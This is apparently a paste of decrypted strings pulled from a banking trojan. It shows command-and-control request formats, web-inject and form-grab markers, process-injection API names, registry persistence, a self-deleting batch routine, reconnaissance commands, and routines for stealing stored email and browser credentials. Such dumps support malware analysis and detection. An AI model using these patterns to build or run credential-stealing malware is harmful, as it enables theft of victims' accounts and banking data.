
Decrypted

a guest
Jan 6th, 2019
  1. ADVAPI32.DLL.CryptGetUserKey.KERNEL32.DLL.LoadLibraryExW.WS2_32.DLL.WSARecv.WSASend.closesocket.recv.CHROME.DLL.soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x.version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s.&ip=%s.&os=%s.%u.%u_%u_%u_x%u.&tor=1.Mozilla/5.0 (Windows NT %u.%u%s; rv:62.0) Gecko/20100101 Firefox/62.0.http://.https://.file://.USER.ID.%lu.exe./upd %lu.Software\AppDataLow\Software\Microsoft\.Main.Block.Temp.Client.Ini.Keys.Scr.Kill.LastTask.LastConfig.CrHook.OpHook.Exec..onion.TorClient.TorCrc.%s %s HTTP/1.1
  2. Host: %s
  3. User-Agent: %s
  4. Connection: close;
  5. Content-length: %u
  6.  
  7. ...\.http://constitution.org/usdeclar.txt.C:\Program Files\Internet Explorer\iexplore.exe.Software\Microsoft\Windows\CurrentVersion\Run.System\CurrentControlSet\Control\Session Manager\AppCertDlls.text.image.json.html.javascript.xml.URL: %s
  8. user=%s
  9. pass=%s.URL: %s
  10. REF: %s
  11. LANG: %s
  12. AGENT: %s
  13. COOKIE: %s
  14. POST: .USERID: %s
  15. .USER: %s
  16. .DEVICE: %s
  17. CLASS: %s
  18. INTERFACE: %s
  19. ADD: %u
  20. .@%s@.grabs=.HIDDEN.%08x%08x%08x%08x.@ID@.@GROUP@.@RANDSTR@.@URL=*@.@CONFIG=*@.@VIDEO=*@.@SOCKS=*@.@KILL=*@.@VNC=*@.%s.%s.http..bat..bin.64.Local\..\\.\pipe\.%APPDATA%\Microsoft\.%APPDATA%.form.log.keys.POST.Content-Disposition: form-data; name="upload_file"; filename="%s".P.O.S.T...--%s
  21. %s
  22.  
  23. .--%s--
  24. .G.E.T...GET.-01.%u%u%u.Content-Type: multipart/form-data; boundary=%s.Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu".Content-Type: application/octet-stream.{%08X-%04X-%04X-%04X-%08X%04X}.%08X-%04X-%04X-%04X-%08X%04X.S:(ML;;NW;;;LW)D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1).\Run.o.p.e.n...%lu.bat.attrib -r -s -h %%1
  25. :%u
  26. del %%1
  27. if exist %%1 goto %u
  28. del %%0
  29. .\Vars.\Files.\Config./data.php?version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s./UPD./SD./sd %lu.\Software\Microsoft\Windows\CurrentVersion.**.%.A.P.P.D.A.T.A.%.\.M.o.z.i.l.l.a.\.F.i.r.e.f.o.x.\.P.r.o.f.i.l.e.s...EnableSPDY3_0.\.M.a.c.r.o.m.e.d.i.a.\.F.l.a.s.h. .P.l.a.y.e.r.\...c.o.o.k.i.e.s...s.q.l.i.t.e...NSPR4.DLL.c.o.o.k.i.e.s...s.q.l.i.t.e.-.j.o.u.r.n.a.l...NSS3.DLL.ieui.*...s.o.l...*...t.x.t...\.c.o.o.k.i.e...f.f...OPERA.EXE.\.c.o.o.k.i.e...i.e...NTDLL.DLL.\.s.o.l.s...\.\.?.\...ieapfltr.Content-MD5:.*...*...q.w.e.r.t.y...Accept-Encoding:.Cookie: . .-.-.u.s.e.-.s.p.d.y.=.o.f.f. .-.-.d.i.s.a.b.l.e.-.h.t.t.p.2...g.i.f...j.p.e.g...SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.Content-Encoding:.%.0.2.u.-.%.0.2.u.-.%.0.2.u. .%.0.2.u.:.%.0.2.u.:.%.0.2.u.
  30. .
  31. .%.s.
  32. .
  33. .%.s.
  34. .
  35. .
  36. .
  37. .%.s.
  38. .
  39. .
  40. .
  41. ...%.0.2.u.-.%.0.2.u.-.%.0.2.u. .%.0.2.u.:.%.0.2.u.:.%.0.2.u.
  42. .
  43. .C.l.i.p.b.o.a.r.d.
  44. .
  45. .
  46. .
  47. .%.s.
  48. .
  49. .
  50. .
  51. ...Host:.W.i.n.d.o.w.s. .E.x.p.l.o.r.e.r...Content-Type:.D.e.l.e.g.a.t.e.E.x.e.c.u.t.e...S.O.F.T.W.A.R.E.\.C.l.a.s.s.e.s.\.C.h.r.o.m.e...c.o.m.m.a.n.d...*...*...WININET.DLL.WSOCK32.DLL.WININET.dll.VERSION.dll.kernelbase.ieframe.urlmon.mshtml.inetcpl.cpl.NTDSAPI.DLL.User-Agent:.Connection:.Content-Length:.Transfer-Encoding:.Referer: .Accept-Language: .Content-Security-Policy:.Content-Security-Policy-Report-Only:.X-Frame-Options.Access-Control-Allow-Origin:.Cache-Control:.Last-Modified:.Etag:.no-cache, no-store, must-revalidate.%x
  52. .ocsp. chunked. identity. gzip, deflate.gzip.
  53.  
  54. .HTTP/1.1 404 Not Found
  55.  
  56. .%02u:%02u:%02u .EMPTY
  57. .Cmd %s processed: %u. | "%s" | %u
  58. .Cmd %u parsing: %u.PR_Read.PR_Write.PR_Close.cmd /C "%s> %s1".systeminfo.exe .tasklist.exe /SVC >.driverquery.exe >.reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >.cmd /U /C "type %s1 > %s & del %s1".net view >.nslookup 127.0.0.1 >.echo -------- >.nslookup myip.opendns.com resolver1.opendns.com .ss: *.*.*.*
  59. .Unknown..pfx.My.AddressBook.AuthRoot.CertificateAuthority.Disallowed.Root.TrustedPeople.TrustedPublisher.InternetSetStatusCallback.HttpAddRequestHeadersW.HttpAddRequestHeadersA.HttpQueryInfoW.HttpQueryInfoA.InternetConnectW.InternetConnectA.InternetQueryDataAvailable.HttpSendRequestW.HttpSendRequestA.InternetReadFileExW.InternetReadFileExA.InternetWriteFile.InternetReadFile.HttpOpenRequestW.RegQueryValueExW.RegGetValueW.PR_Poll.PR_GetError.PR_SetError.ExitProcess.LdrRegisterDllNotification.LdrUnregisterDllNotification.CreateProcessA.CreateProcessW.CreateProcessAsUserA.CreateProcessAsUserW.ZwGetContextThread.ZwSetContextThread.ZwWriteVirtualMemory.ZwWow64QueryInformationProcess64.ZwWow64ReadVirtualMemory64.ZwProtectVirtualMemory.LdrLoadDll.LdrGetProcedureAddress.LoadLibraryA.RtlExitUserThread.CreateRemoteThread.%02u-%02u-%02u %02u:%02u:%02u
  60. .PluginRegisterCallbacks..rdata....text.....data....DLL load status: %u.%s=%s&.0123456789ABCDEF.Main.Blocked.
  61. user_pref("network.http.spdy.enabled", false);..avi.p.r.e.f.s...j.s...%s=%s&./.HTTPMail.SMTP.POP3.IMAP.none.WABOpen.Software\Microsoft\Windows Mail.Software\Microsoft\Windows Live Mail.Store Root.Salt.account{*}.oeaccount.Server.User_Name.Password2.Port.Secure_Connection.A.c.c.o.u.n.t._.N.a.m.e...NSS_Init.hostname.t.y.p.e.=.%.S.,. .n.a.m.e.=.%.S.,. .a.d.d.r.e.s.s.=.%.S.,. .s.e.r.v.e.r.=.%.S.,. .p.o.r.t.=.%.u.,. .s.s.l.=.%.S.,. .u.s.e.r.=.%.S.,. .p.a.s.s.w.o.r.d.=.%.S...PK11_Authenticate.t.y.p.e.=.%.S.,. .n.a.m.e.=.%.s.,. .a.d.d.r.e.s.s.=.%.s.,. .s.e.r.v.e.r.=.%.s.,. .p.o.r.t.=.%.u.,. .s.s.l.=.%.s.,. .u.s.e.r.=.%.s.,. .p.a.s.s.w.o.r.d.=.%.s...NSS_Shutdown..gif.M.e.s.s.a.g.e.A.c.c.o.u.n.t...PK11_FreeSlot.S.M.T.P._.E.m.a.i.l._.A.d.d.r.e.s.s...encryptedUsername.%.S._.%.S...0.x...encryptedPassword.E.m.a.i.l.A.d.d.r.e.s.s.C.o.l.l.e.c.t.i.o.n./.E.m.a.i.l.A.d.d.r.e.s.s.[.%.u.]./.A.d.d.r.e.s.s...S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.O.f.f.i.c.e.\.1.5...0.\.O.u.t.l.o.o.k.\.P.r.o.f.i.l.e.s.\.O.u.t.l.o.o.k.\...",.&uptime=%u.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .N.T.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.W.i.n.d.o.w.s. .M.e.s.s.a.g.i.n.g. .S.u.b.s.y.s.t.e.m.\.P.r.o.f.i.l.e.s.\.O.u.t.l.o.o.k.\...&time=%lu.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.O.f.f.i.c.e.\.1.6...0.\.O.u.t.l.o.o.k.\.P.r.o.f.i.l.e.s.\.O.u.t.l.o.o.k.\...%systemroot%\syswow64\cmd.exe.E.m.a.i.l...A.c.c.o.u.n.t. .N.a.m.e....jpeg.I.M.A.P. .S.e.r.v.e.r...I.M.A.P. .P.o.r.t...I.M.A.P. .U.s.e.r...I.M.A.P. .P.a.s.s.w.o.r.d...I.M.A.P. .U.s.e. .S.S.L....bmp..avi.P.O.P.3. .U.s.e.r...P.O.P.3. .S.e.r.v.e.r...P.O.P.3. .P.o.r.t...P.O.P.3. .P.a.s.s.w.o.r.d...P.O.P.3. .U.s.e. .S.S.L...&action=%08x.Client32.S.M.T.P. .U.s.e.r...S.M.T.P. .S.e.r.v.e.r...S.M.T.P. .P.o.r.t...S.M.T.P. .P.a.s.s.w.o.r.d...S.M.T.P. .U.s.e. .S.S.L...Client64.%systemroot%\system32\c_1252.nls.A.8.0.0.0.A...ICGetInfo.1...0...n.s.s.3...d.l.l...PK11_GetInternalKeySlot.PK11SDR_Decrypt.://.DllRegisterServer.%.P.R.O.G.R.A.M.F.I.L.E.S.%.\.M.o.z.i.l.l.a. 
.T.h.u.n.d.e.r.b.i.r.d.....%.U.S.E.R.P.R.O.F.I.L.E.%.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.h.u.n.d.e.r.b.i.r.d.\.P.r.o.f.i.l.e.s.\.*...d.e.f.a.u.l.t.....\.l.o.g.i.n.s...j.s.o.n...../.C. .p.a.u.s.e. .m.a.i.l...%c%02X.\\.\%s...r.u.n.d.l.l.3.2...msvfw32.ICOpen.ICClose.ICInfo.ICSendMessage.\*.dll....r.u.n.d.l.l.3.2. .".%.s.".,.%.S.......e.x.e.......d.l.l.....*...b.i.n